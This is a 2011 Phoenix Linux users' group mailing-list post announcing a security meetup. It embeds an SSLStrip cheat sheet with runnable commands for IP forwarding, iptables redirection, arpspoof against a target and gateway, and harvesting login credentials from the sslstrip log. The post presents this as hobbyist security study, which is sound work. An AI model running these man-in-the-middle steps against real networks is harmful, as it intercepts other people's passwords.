HackFest Tomorrow @ Noon 260 Arizona Avenue Chandler Gangplankhq.com

Lisa Kachold lisakachold at obnosis.com
Fri Feb 11 19:48:03 MST 2011


Next PLUG Security Team Saturday Noon - 15:00 Gangplankhq.com
http://plug.phoenix.az.us

David Huerta will be showcasing hayst.ac - his Firefox Security Plugin; but
one of the many Haystack Project <http://haystackproject.org/>s:

http://en.wikipedia.org/wiki/Haystack_%28MIT_project%29#External_links

After arriving in Arizona from the posh, cosmopolitan enclave of
southeastern Idaho, David founded the DeVry Linux User Group (DeLUG) in
2003, an originally student organization that drew members and activities
from the greater West Valley Free software community, including students at
GCC and ASU West. He is also the founder of Hayst.ac, a web history
obfuscation system, and serves on the board of directors for HeatSync Labs,
a hackerspace in Chandler.

> *PLUG-TREK "Our 12 year mission... to Identify, architect and traverse OSI
> layer 0-8 security <http://linuxgazette.net/166/kachold.html>; use modern
> professional test methodology tools from forensics to pentesting. Transcend
> systems administration to reverse engineering, forensic fuzzing, earnest
> exploits and claim a bugtraq accolade or two... Da da, da, da, da, da
> dum...muzak..."
> *
>

Behind the scenes: Cisco WPA2-Enterprise network setup.
Planning for Hamaci/LogMeIn HackFests
Rebuild old Linux system (with radius for enterprise-WPA2) into gPXE for
imaging (Just like we did for Installfest):
http://www.ardyans.co.cc/ltsp-with-ubuntu-10-04.htm
http://www.ardyans.co.cc/how-to-make-a-gpxe-for-booting-client.htm
Add a puppet cfengine process to maintain our configuration files even after
edited.


Just Like Farengi - We Like to BE PREPARED:

# SSLStrip CHEATSHEET

OVERVIEW:

Requirements

    * Python >= 2.4 (apt-get install python)
    * The python "twisted-web" module (apt-get install twisted-web)

Setup

    * tar zxvf sslstrip-0.5.tar.gz
    * cd sslstrip-0.5
    * (optional) sudo python ./setup.py install

Running sslstrip

    * Flip your machine into forwarding mode. (echo "1" >
/proc/sys/net/ipv4/ip_forward)
    * Setup iptables to redirect HTTP traffic to sslstrip.
(iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT
--to-port <listenPort>)
    * Run sslstrip. (sslstrip.py -l <listenPort>)
    * Run arpspoof to convince a network they should send their traffic to
you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

Thanks to Moxie MarlinSpike

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-speakers.html#Marlinspike

STEP X STEP (for those who need it slower):

# Proxy Preparation

    * First verify routing and nat;

    # cat /proc/sys/net/ipv4/ip_forward

    * 0

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    # cat /proc/sys/net/ipv4/ip_forward

    * 1

    # /sbin/iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 8080

# Start MITM

    * Arpspoof addresses to default interface gateway (and target machine)

     # arpspoof –i eth0 –t 192.168.1.231 192.168.1.244

# SSL Strip

    * Start SSLStrip:

    # ./sslstrip –l 8080

* Open Browser  -  Go Login to SSL https://Gmail.com (for instance)

# tail –f sslstrip.log

You will log the name:password pairs for each site visited from the proxy.

As you can see, the default gateway and target machine can be seasoned to
taste.

./sslstrip -h

------------------------------------end SHEETCHEAT

 http://www.obnosis.com

*Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!*
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20110211/81cade49/attachment.html>


More information about the PLUG-discuss mailing list